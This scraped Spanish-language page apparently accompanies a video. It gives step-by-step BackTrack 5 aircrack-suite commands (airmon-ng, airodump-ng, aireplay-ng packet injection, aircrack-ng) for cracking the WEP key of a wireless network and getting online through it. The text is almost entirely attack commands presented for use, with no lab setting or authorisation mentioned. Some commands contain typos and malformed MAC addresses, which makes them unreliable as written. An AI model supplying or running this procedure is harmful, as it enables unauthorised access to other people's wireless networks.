Está en la página 1de 1

EN ESTE VIDEO MUESTRO PASO A PASO COMO VULNERAR UNA RED INALAMBRICA CON ENCRIPTADO WEP DESCARGAR BACKTRACK

(SELECCIONAR VERSION Y SISTEMA DE ARCHIVOS) http://www.backtrack-linux.org/downlo... ======================================================= COMANDOS PARA DESENCRIPTAR CLAVES WEP CON BACKTRACK 5 ======================================================= airmon-ng airmon-ng start wlan0 airomon-ng mon0 ctrl + c airodump-ng -w redes -c 11 --bssid 84:4B::F5:57:43:3A mon0 aireplay-ng -1 0 -a 84:4B::F5:57:43:3A mon0 aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff: -b 84:4B::F5:57:43:3A mon0 -h (tu direccion mac) mon0 **se empiezan a generer paquetes** use this packet? "y" cuando llegue a los 30,000 o sobre pase los 30,000 en la terminal #2 pulsar 2 veces ctrl+c en la terminal de arriba pulsar una vez ctrl+c

EN LA TERMINAL DE ABAJO ====================== en la terminal de abajo "clear" dir aircrack-ng redes-01.cap leera los paquetes capturados y dira KEY FOUND! xx:xx:xx:xx:xx LA CLAVE SE INGRESA SIN LOS DOS PUNTOS Y LISTO ESTAMOS EN LINEA =)

También podría gustarte